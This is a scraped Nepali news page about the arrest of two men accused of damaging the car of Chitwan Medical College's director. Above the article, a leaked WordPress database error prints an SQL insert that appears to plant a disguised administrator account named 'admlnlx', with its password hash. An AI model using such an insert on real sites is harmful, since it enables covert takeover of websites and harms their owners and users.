WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKfWqCAKPPGlVAhVZ3j0REUp0Br0UG1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-26 09:58:12', '', 'admlnlx', 'admlnlx')
चितवन, माघ १३–
चितवन मेडिकल कलेजका प्रवन्ध निर्देशक डा.हरिशचन्द्र न्यौपाने सवार गाडीमा तोडफोड गरेको आरोपमा दुई जना पक्राउ परेका छन् ।
जिल्ला प्रहरी कार्यालय चितवनका प्रहरी उपरीक्षक दीपक थापाले नारायणी अनलाईनलाई दिएको जानकारी अनुसार पक्राउ पर्नेमा धिरेन्द्र शाह र लोकराज पाण्डे रहेका छन् । हामीले शंकाको आधारमा पक्राउ गरेका हौं, छानविन भईरहेको छ”–एसपी थापाले भन्नुभयो । स्रोतका अनुसार पक्राउ परेका पाण्डे विप्लव माओवादीका किसान संघका केन्द्रीय अध्यक्ष हुन् । पक्राउ परेका शाह भने विप्लव माओवादीका हुन् या होईन भन्ने स्पष्ट नभएको स्रोतको भनाई छ ।
डा.न्यौपाने सवार गाडीमा चितवन मेडिकल कलेज परिसरमा केही युवाहरुले क्रिकेटको स्ट्याम्पले हानेर तोडफोड गरेका थिए । लगत्तै साँझ विप्लव निकट विद्यार्थी संगठनले घटना बारे जानकारी गराएका थिए ।